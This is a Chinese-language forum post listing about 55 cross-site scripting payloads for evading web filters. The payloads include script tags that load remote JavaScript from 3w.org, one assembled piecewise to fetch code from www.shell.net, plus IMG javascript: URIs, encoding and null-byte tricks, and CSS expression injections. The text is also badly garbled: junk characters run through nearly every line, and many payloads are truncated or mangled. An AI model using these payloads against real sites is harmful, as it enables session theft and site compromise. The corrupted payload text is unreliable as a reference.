(1)普通的XSS JavaScript注入
9 ?9 U. s$ G) G/ _# g( u# \7 Y1 z- e<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>) U5 k5 T8 V: q1 a& R" x- _7 e" V
(99)另类弹框
3 ~' v3 {) I8 L0 m, I5 K<q/oncut=alert()>1
3 y" u4 I& G8 o5 }2 e7 C2 t<s/onclick=alert()>b
8 R0 i$ ~. d' } <XSS=" onclick="alert(1)//">clickme</SSX=">* ~$ l: y4 X0 U; {$ L
<zzz onclick=alert`1`>clickme</zzz>
* |0 C, h* A% R* j! h9 R <a onclick=alert`1`>clickme</a>
# N" Y ]: h$ G" E) D5 |9 D; Q6 L<a=">clickme</a="> S# e0 e) R4 P3 Y) c' H5 D% r
<a=">clickme</a>6 D2 w5 c6 T/ j/ x5 N8 K& X G* N3 {6 U
<z=">clickme</z=">
! t; k) d6 U. Q; @+ ~" D1 N4 h+ D<z onclick=alert`1`>clickme</z>
4 X) v& D5 e0 R: e2 M2 s: B5 j" }& Q4 I, M/ f
(2)IMG标签XSS使用JavaScript命令0 V1 x. O0 e& r; |/ E) e) w/ T4 a
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>( Y% [# H$ q8 A1 B3 i8 A; u) I4 [
5 }+ U' ^2 S N; a( U& H8 E(3)IMG标签无分号无引号* w5 H$ n. X9 q* S
<IMG SRC=javascript:alert(‘XSS’)>
9 S; b2 u0 U! p+ \3 K
$ F& a- W+ P' g' ]# h(4)IMG标签大小写不敏感
5 i4 \' i6 x9 F d" }<IMG SRC=JaVaScRiPt:alert(‘XSS’)>, r/ h/ E3 K7 Y% `! c; e! \
6 ]7 R/ e% X, n% F7 R0 X3 O1 `(5)HTML编码(必须有分号)
* { o6 [; Y9 [* \! _<IMG SRC=javascript:alert(“XSS”)>- V( a. s$ p+ \; _0 h( R# D
3 _4 E0 n8 ]6 W6 W(6)修正缺陷IMG标签
* h$ p; S* @- z<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
# E. y2 @# g7 ?6 m7 ]' i B9 f6 y% i% j, {2 p P1 \& X' k
(7)formCharCode标签(计算器)- G& t9 t0 ?( d* |8 [
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>% I0 g+ L. b5 D5 ?) }5 e+ W
' Y" _4 Y: f, J(8)UTF-8的Unicode编码(计算器)) { r( l2 o# f! Q, A
<IMG SRC=jav..省略..S')>5 \& o# e6 O+ H4 E7 y5 m
2 k o1 m) k4 {' c7 Q(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
0 S. ?6 D" c% j" D: v8 C6 X<IMG SRC=jav..省略..S')>
6 \& e* q" a \5 s: I8 H* n3 C2 D, F* m1 \
(10)十六进制编码也是没有分号(计算器)( p( N* b3 h& R/ d! P! @2 a" C
<IMG SRC=\'#\'" /span>
# L: h" v( q8 C4 h
# z; t2 f$ H; s' L(11)嵌入式标签,将Javascript分开
8 N6 s7 o: p* D/ K( }" [<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
! e9 V0 }0 j7 a4 g- C
2 X5 R' C5 n+ A- g(12)嵌入式编码标签,将Javascript分开' @7 D& K5 U) q6 F5 c0 @
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
* f1 k8 m1 o7 R, Q) C$ n. |0 V4 x( x8 |
(13)嵌入式换行符( C# V4 b) a( _# i; U; t. [
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
* N, M1 {# s" r
1 C% z; T* d2 Q) k(14)嵌入式回车" Z. b" p* [2 a p
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
# j% m$ Q% d* b* U; G: j* _( S9 N8 q0 o, F: m
(15)嵌入式多行注入JavaScript,这是XSS极端的例子3 ~' N, R& B3 l0 V6 r
<IMG SRC=\'#\'" /span>
9 Q I, u5 V2 _' E5 D( p1 e: q( {0 c7 N J& T
(16)解决限制字符(要求同页面)
2 P0 c6 I5 A/ t( b( a<script>z=’document.’</script># ~ T' E+ ~* X! W, G& l
<script>z=z+’write(“‘</script>/ G4 a+ W2 Z5 S6 e! ^( c) G0 y% V
<script>z=z+’<script’</script>; L! h7 E+ X- z$ G# H
<script>z=z+’ src=ht’</script>% g/ w4 m- Q7 B5 Y1 `/ ]3 ]
<script>z=z+’tp://ww’</script>4 q; D) i* h8 R1 K+ L, H
<script>z=z+’w.shell’</script> |# p% S7 H' d. o. M$ H
<script>z=z+’.net/1.’</script>: d( ]1 f1 P9 `7 j3 i4 d# T5 N; @
<script>z=z+’js></sc’</script>3 }1 d% d$ H4 a w/ V, w
<script>z=z+’ript>”)’</script> J. I' t8 _9 n( O- B
<script>eval_r(z)</script>
4 F/ {! E6 I; G, A' a6 t0 ^9 ]8 Q- S" d; c1 Y
(17)空字符+ I/ E, S" d, E. e& v! `- j
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out; p1 L( x3 V, d. r: N0 u
, o9 @8 y6 s% F; T1 V+ C* U- M(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
0 Z9 l2 R- P: F* Z2 Tperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out& a* C: C9 C9 e" g
* ?* o& Y1 p8 o9 x: X(19)Spaces和meta前的IMG标签5 o& G' e4 L- C* N+ x9 R
<IMG SRC=\'#\'" � javascript:alert(‘XSS’);”>7 D8 h: |# d# L+ Y
" _. n( a/ q9 D# F3 {# J- m(20)Non-alpha-non-digit XSS
2 U7 W$ y4 \; e, d+ P<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
$ f% P6 ^% j2 M: b! F. X3 t: X$ x( a4 S: S0 w
(21)Non-alpha-non-digit XSS to 2" i( \) x9 T3 j2 R$ b
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
' E# \' h* r' H- Z0 T& s; V; E: @$ N& w, z7 _& V# ]: z
(22)Non-alpha-non-digit XSS to 3& L. P4 C* {/ g0 }/ S
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
1 d g# X6 T/ X% T4 i" `; }& T: J3 Z" c N V; _5 }+ ~
(23)双开括号" i5 \& O( N3 }5 b1 i3 o0 d- d3 n
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
8 ~; L' S F* }( W) V1 C' s+ x' B4 z) f. B4 X. D3 |
(24)无结束脚本标记(仅火狐等浏览器)# j/ k* d0 K( x' w' A# Z
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
# D' P* \! D4 ^1 I) _ k
" t3 G: F8 Q. \. _1 ~. A(25)无结束脚本标记2
2 h: T7 o5 l4 X1 F5 Q! [1 L6 _5 i0 \<SCRIPT SRC=//3w.org/XSS/xss.js>
t+ Z4 Z0 @- q% m6 ^; i' g5 @$ v' a% [4 {
(26)半开的HTML/JavaScript XSS
; ^/ i5 e, H& {: c* `" _# f2 j<IMG SRC=\'#\'" /span>" o$ q9 ]9 P* l A- T. `# P
8 h1 I5 Y. D9 f$ \
(27)双开角括号+ E- N8 T. `* @' U4 t+ Z
<iframe src=http://3w.org/XSS.html <
+ ^3 k0 P! n- e( r g
$ r" z5 p/ X/ [, b: _(28)无单引号 双引号 分号3 [. p& o: J. d
<SCRIPT>a=/XSS/
+ @4 @2 }7 L9 ealert(a.source)</SCRIPT>
: L( F9 I+ T/ ?3 r# T+ i. b
- r9 k' @- t4 _# k% E- D& ]4 e(29)换码过滤的JavaScript
( a+ K8 ]5 e# ]- d( z. @$ o: N8 D\”;alert(‘XSS’);//; P& x2 `* h& L9 ], G; }) T
( |0 T) R! I6 A7 ^3 Z( ]' P' s$ q
(30)结束Title标签
# Y& m& I o% F, d5 Z2 _</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>$ k. b/ _* I6 {% {; C
/ [: b" l% @; C( h) l(31)Input Image
6 D4 [& k1 J" [4 G {: A- A<INPUT SRC=\'#\'" /span>1 y6 h6 t; O- U/ c% A# v# S7 w1 l
: Q; `1 r. T2 l% O6 q' Y* R
(32)BODY Image% P2 R6 A2 h2 T l
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
3 Q. a4 y$ s. z0 A6 r" H0 I m3 b; }3 [9 q# {+ E @
(33)BODY标签3 O7 S; p& H& L( O$ A/ q; n
<BODY(‘XSS’)>
: n j) @6 S A* @2 D2 d
: A5 G( w5 A7 E(34)IMG Dynsrc
3 G; X/ N3 k8 u9 g( x3 n<IMG DYNSRC=\'#\'" /span>
h4 ~* |! n, P& V' W; G
# |$ b# f0 k2 w7 C4 K1 C, D& v7 i. F(35)IMG Lowsrc7 I# \9 q# S" I% ~7 _
<IMG LOWSRC=\'#\'" /span>8 ?6 \: y% Y) G
) t" Y! n( Y: I. X(36)BGSOUND# J4 u5 a: Q4 v4 G u% `0 ?
<BGSOUND SRC=\'#\'" /span>7 M* W2 X& {( [+ h3 @# H' p( y
' Q" }4 Q/ }% Q5 t- I+ c
(37)STYLE sheet
9 B6 {- a2 }* k/ e" T<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
9 Y! M2 W W9 Z; U* ]4 u7 V( v$ K2 Q4 Z
(38)远程样式表
; X7 A% H3 j7 G3 O% D<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>+ s0 V7 d1 T* v! u" u9 ?! g
9 f, x& h- Y! f# ], ] I* c(39)List-style-image(列表式)8 \5 Y* {8 v+ P3 T
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS$ d+ i4 y+ j) h6 k. \7 p
4 u/ V, L& p) k. l# u8 l# G& }(40)IMG VBscript
; b7 A/ z I) m0 z( ~5 A/ Z/ x) p<IMG SRC=\'#\'" /STYLE><UL><LI>XSS8 r( k4 z) e. I
; A4 ?' J/ |5 o( y* b- V# }(41)META链接url
! c3 A; w. S5 l0 Q( t7 D, t<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
4 R1 t: o j. v2 | L6 X3 A$ A/ J2 z
(42)Iframe n8 P& W) d5 I- {
<IFRAME SRC=\'#\'" /IFRAME>
! O4 f2 z( q$ v1 G6 U, L6 L: r! Z( e6 L( |
(43)Frame+ f2 B6 l7 V4 i: `- [* G4 g: |
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>
- ` A o- P6 O* p' |1 i Y
5 c p1 K4 x( g0 b- w(44)Table9 v! E- o5 M6 `
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
6 x$ w, R( W4 `, N0 h A+ O% V/ r* s# K$ I1 i/ V
(45)TD& A; ^: ]. o2 v5 F9 f
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
5 Q9 Q2 N' b( w4 I9 n' L2 U- L I5 J+ ^; D6 c0 x& G% u1 F
(46)DIV background-image; x- T- X/ f8 X1 Q
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
, m+ ~( k, R D
# Z# `7 [2 h7 ~! ]5 ~% e. ] a' h; R0 E(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
) b; v; P) T6 R$ c: m! p/ T7 b<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>0 h: N+ n' R0 }6 I/ p
) M K* @1 E C! w, w. l
(48)DIV expression" ]+ S/ ~# b6 ]' ?) G
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
) L- [# T4 x- v1 r
( g, s2 v' F$ b' _/ @(49)STYLE属性分拆表达$ S/ h9 ?: o M' ^8 ]2 u+ M) c
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”># F& F- s+ J9 C
6 d) l0 H/ X' ~) q* g0 m; }! j8 s/ \(50)匿名STYLE(组成:开角号和一个字母开头)& R7 Z4 {" A1 X4 B
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>; o1 g* ~3 \7 {& }1 @
; a5 ?) x) N$ C4 p9 j5 g$ _(51)STYLE background-image
3 |! g$ }/ @( d- W- Y6 c" P<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>, f2 S& ^) {) j8 F
/ L9 b/ W0 t- V' m
(52)IMG STYLE方式! X: c$ @6 F* C/ Y7 Y% X* i
exppression(alert(“XSS”))’>' ~# {5 j0 K, l5 v/ x: o* k0 J8 X
: c0 P, ?. X4 a6 }$ o8 u' V' D(53)STYLE background
( ^) W% U- H8 I0 h5 C& z9 t<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>: a# N9 Q6 w' t! h) m: g4 f& Q
% y: J( V5 B9 V; ]$ q- K2 }$ s
(54)BASE
5 Z7 T8 x* o" i+ q. c& h<BASE HREF=”javascript:alert(‘XSS’);//”>
3 j1 b9 [5 }; m6 e. W" I3 ]8 `! D# ^
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS1 L$ F) N, J' I+ v# d7 ^5 T& t
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>& l# Q( Q0 I* r5 z0 Z! m9 r- l
|
发表于 2016-4-28 10:06:15
收藏
支持
反对